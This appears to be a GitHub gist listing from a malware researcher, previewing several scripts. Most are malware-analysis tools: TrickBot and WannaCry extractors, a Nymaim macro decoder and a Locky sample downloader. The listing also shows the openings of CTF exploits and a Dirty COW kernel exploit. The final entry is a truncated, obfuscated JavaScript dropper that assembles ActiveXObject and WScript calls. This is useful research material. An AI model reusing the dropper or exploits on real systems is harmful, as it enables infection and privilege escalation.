
Maciej Kotowicz mak

mak / trick.py
Created May 16, 2019
Get config from unpacked trickbot
import re
import sys
import pefile
from mlib.crypto import xor
from mlib.malware import trickbot
from mlib.struct import udword
def find_cfg_params(data):
mak / x.js
Created Mar 27, 2019
exploit of plang chall from 0ctf2019
// Halve xint 1074 times and return the result, i.e. scale the argument by 2^-1074.
// NOTE(review): presumably the interpreter stores numbers as IEEE-754 doubles, where
// 2^-1074 is the smallest subnormal step — confirm against the interpreter.
fun int2double(xint) { var i = 0 while(i< 1074) { xint = xint / 2 i = i + 1} return xint }
// Double xd 1074 times and return the result, i.e. scale the argument by 2^1074.
// This is the inverse scaling of int2double, which halves its argument 1074 times.
fun double2int(xd) { var i = 0 while(i< 1074) { xd = xd + xd i = i + 1} return xd }
// Double xint x times and return the result (xint * 2^x); built from addition only,
// so it acts as a left shift by x bits without needing a shift operator.
fun shift(xint,x) { var i = 0 while(i<x) { xint = xint + xint i = i + 1} return xint }
var c = -30
var x = -114
var y = -115
var a = [101,1,1,1,1,1,1,1,1,1]
var b = [1011,2,"chuj",3,4]
mak / exp300.py
Created Jan 3, 2018
Exploit for 300 at 34c3ctf
import phun
class R(phun.Remote):
def menu(self):
    """Wait for the service menu by reading up to its last entry.

    NOTE(review): presumably ``read`` (inherited from ``phun.Remote``)
    consumes input until the given string is seen -- confirm against phun.
    """
    last_menu_entry = '4) free\n'
    self.read(last_menu_entry)
def cmd(self,nr,idx):
self.menu()
self.sendline(str(nr))
mak / wcr.py
Last active Oct 28, 2018
Extract everything from WannaCry
import re
import os,sys
import pefile
import struct
import zipfile
import hashlib
import StringIO
from Crypto import Random
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5,AES
mak / x.sh
Created Mar 7, 2017
one-liner to extract powershell command in recent nymaim's documents
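# Recover the command string hidden in a document's VBA macro.
#
# Pipeline:
#   1. olevba dumps the macro source of "$document"; grep keeps assignment lines.
#   2. sed rewrites the VBA syntax into Python: '&' -> '+', NaN -> None,
#      Array(...) -> [...], and re-quotes string literals containing a quote.
#   3. The second grep keeps only lines that contain '[' or '+'.
#   4. echo appends a Python 2 statement that prints the longest string global.
#   5. python2 runs the generated script; tr strips '^' characters and lowercases
#      the result.
#
# SECURITY: the script fed to python2 is built from the macro source of an
# untrusted document and is executed as Python code. The sed expressions only
# rewrite syntax; they do not restrict what that code can do. Run this inside an
# isolated, disposable analysis environment, never on a workstation holding
# credentials or case data.
#
# "$document" is quoted so that paths containing spaces or glob characters are
# passed to olevba as a single argument.
( olevba "$document" | grep ' = ' | \
sed -e's/&/+/g' -e's/NaN/None/g' -e's/ = [^A].*(\(A.*)\))/= \1/' -e 's/Array//' \
-e's/(/[/g' -e's/)/]/g' -e "s#\"\([^\"]*\)\"\([^\"]*\)\"#\"\1'\2#" | \
grep '\[\|\+'; \
echo 'print globals()[sorted(globals(),key=lambda x: type(globals()[x]) == str and len(globals()[x]))[-1]]'
) \
| python2 - | tr -d '^' | tr '[:upper:]' '[:lower:]'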
mak / hdoc.py
Last active Oct 28, 2018
Extract payload from H-docs
#!/usr/bin/env python2
import os
import re
import sys
import math
import pefile
import struct
import hashlib
import argparse
from oletools import olevba
mak / naughtyc0w.c
Created Oct 22, 2016
exploit for CVE-2016-5195 nothing fancy
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/uio.h>
#include <sys/wait.h>
mak / get_locky.py
Created Jun 22, 2016
locky sample downloader
import sys
import hashlib
import struct
import requests
def decode(data,seed,step):
r = []
k = seed
for c in map(ord,data):
r.append(chr(c ^ k))
mak / h1n1_emu.py
Created May 27, 2016
Unpack last stage of h1n1 loader
import sys
import pefile
from unicorn import *
from unicorn.x86_const import *
pe = pefile.PE(sys.argv[1])
for s in pe.sections:
if s.Name.strip("\x00") == '.rsrc':
code_section = s
mak / Document.js
Last active Oct 28, 2018
Obfuscated dropper
obj_even='fuck';obj_term='aiyyoI';obj_term='thingIm';obj_initiatives6='just';obj_terabytes3='little';obj_since='bitAiyyo7'
;obj_analytics='dispensing';obj_some0='thingIm';obj_target2='motherfucking8';obj_gigabytes='smile';obj_store4='freaks
;obj_percapita='feeding';obj_size10='this';obj_hundreds10='just5';obj_complex='itself2';obj_their1='feeding';obj_sets
='dont4';obj_simulations3='relieveAll';obj_seldom='freaks';var obj_from=this[{the2:'\u0041'}.the2+{h0:'\u0063'}.h0+{o0
:'\u0074'}.o0+{if1:'\u0069'}.if1+{a2:'\u0076'}.a2+{efe0:'\u0065'}.efe0+{ou2:'\u0058'}.ou2+{at3:'\u004f'}.at3+{l1:'\u0062'}
.l1+{ccu1:'\u006a'}.ccu1+{a0:'\u0065'}.a0+{ec0:'\u0063'}.ec0+{an1:'\u0074'}.an1];var obj_thousands7=this[{eri0:'\u0057'}
.eri0+{onn0:'\u0053'}.onn0+{ue0:'\u0063'}.ue0+{un2:'\u0072'}.un2+{iff1:'\u0069'}.iff1+{red3:'\u0070'}.red3+{n3:'\u0074'}
.n3];var obj_data6 = obj_thousands7[{e3:'\u0043'}.e3+{art0:'\u0072'}.art0+{ec1:'\u0065'}.ec1+{l3:'\u0061'}.l3+{ea2
:'\u0074'}.ea2+{o1:'\u0065'}.o1+{ci2:'\u004f'}.ci2+{e2:'\u0062'}.e